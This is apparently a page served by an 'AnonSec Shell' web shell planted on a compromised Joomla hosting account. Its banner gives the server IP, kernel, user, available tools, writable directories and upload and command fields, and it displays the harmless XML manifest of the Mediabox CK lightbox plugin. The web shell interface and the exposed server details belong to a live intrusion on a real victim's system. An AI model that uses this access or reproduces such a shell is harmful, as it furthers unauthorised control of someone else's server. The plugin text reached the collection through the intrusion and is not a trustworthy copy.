AnonSec Shell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.193
Web Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : awebpaca ( 35430)
PHP Version : 8.5.0
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/awebpaca/minedecapgaronne/plugins/system/mediabox_ck/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/awebpaca/minedecapgaronne/plugins/system/mediabox_ck/mediabox_ck.xml
<?xml version="1.0" encoding="utf-8"?>
<extension version="3.0" type="plugin" group="system" method="upgrade">
	<name>MEDIABOXCK_NAME</name>
	<author>Cédric KEIFLIN</author>
	<creationDate>Décembre 2010</creationDate>
	<copyright>Cédric KEIFLIN</copyright>
	<license>http://www.gnu.org/licenses/gpl.html</license>
	<authorEmail>ced1870@gmail.com</authorEmail>
	<authorUrl>http://www.joomlack.fr</authorUrl>
	<version>1.3.5</version>
	<description>MEDIABOXCK_PLUG_DESC</description>
	
	<files>
		<filename plugin="mediabox_ck">mediabox_ck.php</filename>
		<folder>mediabox_ck</folder>
		<folder>language</folder>
	</files>
	<languages folder="language">
		<language tag="en-GB">en-GB/en-GB.plg_system_mediabox_ck.ini</language>
		<language tag="en-GB">en-GB/en-GB.plg_system_mediabox_ck.sys.ini</language>
		<language tag="fr-FR">fr-FR/fr-FR.plg_system_mediabox_ck.ini</language>
		<language tag="fr-FR">fr-FR/fr-FR.plg_system_mediabox_ck.sys.ini</language>
	</languages>
	<config>
		<fields name="params">
			<fieldset name="basic">
				<field name="pageselect" type="text" default="0" label="MEDIABOXCK_PAGESELECT" description="MEDIABOXCK_PAGESELECT_DESC" />
				<field name="attribtype" type="radio" default="rel" label="MEDIABOXCK_ATTRIBTYPE" description="MEDIABOXCK_ATTRIBTYPE_DESC" class="btn-group">
					<option value="className">CLASSNAME</option>
					<option value="rel">REL</option>
				</field>
				<field name="attribname" type="text" default="lightbox" label="MEDIABOXCK_ATTRIBNAME" description="MEDIABOXCK_ATTRIBNAME_DESC" />
				<field name="spacer1" type="spacer" label="MEDIABOXCK_SPACER_STYLES" />
				<field name="cornerradius" type="text" default="10" label="MEDIABOXCK_CORNERRADIUS" description="MEDIABOXCK_CORNERRADIUS_DESC" />
				<field name="shadowoffset" type="text" default="5" label="MEDIABOXCK_SHADOWOFFSET" description="MEDIABOXCK_SHADOWOFFSET_DESC" />
				<field name="overlayopacity" type="text" default="0.7" label="MEDIABOXCK_OVERLAYOPACITY" description="MEDIABOXCK_OVERLAYOPACITY_DESC" />
				<field name="bgcolor" type="text" default="#1a1a1a" label="MEDIABOXCK_BGCOLOR" description="MEDIABOXCK_BGCOLOR_DESC" />
				<field name="overlaycolor" type="text" default="#000" label="MEDIABOXCK_OVERLAYCOLOR" description="MEDIABOXCK_OVERLAYCOLOR_DESC" />
				<field name="text1color" type="text" default="#999" label="MEDIABOXCK_TEXT1COLOR" description="MEDIABOXCK_TEXT1COLOR_DESC" />
				<field name="text2color" type="text" default="#fff" label="MEDIABOXCK_TEXT2COLOR" description="MEDIABOXCK_TEXT2COLOR_DESC" />
				<field name="usehtc" type="radio" default="1" label="MEDIABOXCK_USEHTC" description="MEDIABOXCK_USEHTC_DESC" class="btn-group" >
					<option value="1">Yes</option>
					<option value="0">No</option>
				</field>
				<field name="spacer2" type="spacer" label="MEDIABOXCK_SPACER_RESIZE" />
				<field name="resizeopening" type="radio" default="1" label="MEDIABOXCK_RESIZEOPENING" description="MEDIABOXCK_RESIZEOPENING_DESC" class="btn-group" >
					<option value="1">Yes</option>
					<option value="0">No</option>
				</field>
				<field name="resizeduration" type="text" default="240" label="MEDIABOXCK_RESIZEDURATION" description="MEDIABOXCK_RESIZEDURATION_DESC" />
				<field name="resizetransition" type="list" default="0" label="MEDIABOXCK_RESIZETRANSITION" description="MEDIABOXCK_RESIZETRANSITION_DESC" >
					<option value="0">Linear</option>
					<option value="Quad.easeIn">Quad In</option>
					<option value="Quad.easeOut">Quad Out</option>
					<option value="Quad.easeInOut">Quad In Out</option>
					<option value="Cubic.easeIn">Cubic In</option>
					<option value="Cubic.easeOut">Cubic Out</option>
					<option value="Cubic.easeInOut">Cubic In Out</option>
					<option value="Quart.easeIn">Quart In</option>
					<option value="Quart.easeOut">Quart Out</option>
					<option value="Quart.easeInOut">Quart In Out</option>
					<option value="Quint.easeIn">Quint In</option>
					<option value="Quint.easeOut">Quint Out</option>
					<option value="Quint.easeInOut">Quint In Out</option>
					<option value="Expo.easeIn">Expo In</option>
					<option value="Expo.easeOut">Expo Out</option>
					<option value="Expo.easeInOut">Expo In Out</option>
					<option value="Circ.easeIn">Circ In</option>
					<option value="Circ.easeOut">Circ Out</option>
					<option value="Circ.easeInOut">Circ In Out</option>
					<option value="Sine.easeIn">Sine In</option>
					<option value="Sine.easeOut">Sine Out</option>
					<option value="Sine.easeInOut">Sine In Out</option>
					<option value="Back.easeIn">Back In</option>
					<option value="Back.easeOut">Back Out</option>
					<option value="Back.easeInOut">Back In Out</option>
					<option value="Bounce.easeIn">Bounce In</option>
					<option value="Bounce.easeOut">Bounce Out</option>
					<option value="Bounce.easeInOut">Bounce In Out</option>
					<option value="Elastic.easeIn">Elastic In</option>
					<option value="Elastic.easeOut">Elastic Out</option>
					<option value="Elastic.easeInOut">Elastic In Out</option>
				</field>
				<field name="initialwidth" type="text" default="320" label="MEDIABOXCK_INITIALWIDTH" description="MEDIABOXCK_INITIALWIDTH_DESC" />
				<field name="initialheight" type="text" default="180" label="MEDIABOXCK_INITIALHEIGHT" description="MEDIABOXCK_INITIALHEIGHT_DESC" />
				<field name="vertioffset" type="text" default="0" label="MEDIABOXCK_VERTIOFFSET" description="MEDIABOXCK_VERTIOFFSET_DESC" />
				<field name="horizoffset" type="text" default="0" label="MEDIABOXCK_HORIZOFFSET" description="MEDIABOXCK_HORIZOFFSET_DESC" />
				<field name="spacer3" type="spacer" label="MEDIABOXCK_SPACER_DISPLAY" />
				<field name="defaultwidth" type="text" default="640" label="MEDIABOXCK_DEFAULTWIDTH" description="MEDIABOXCK_DEFAULTWIDTH_DESC" />
				<field name="defaultheight" type="text" default="360" label="MEDIABOXCK_DEFAULTHEIGHT" description="MEDIABOXCK_DEFAULTHEIGHT_DESC" />
				<field name="showcaption" type="radio" default="1" label="MEDIABOXCK_SHOWCAPTION" description="MEDIABOXCK_SHOWCAPTION_DESC" class="btn-group" >
					<option value="1">Yes</option>
					<option value="0">No</option>
				</field>
				<field name="showcounter" type="radio" default="1" label="MEDIABOXCK_SHOWCOUNTER" description="MEDIABOXCK_SHOWCOUNTER_DESC" class="btn-group" >
					<option value="1">Yes</option>
					<option value="0">No</option>
				</field>
			</fieldset>
		</fields>
	</config>
</extension>

Anon7 - 2022
AnonSec Team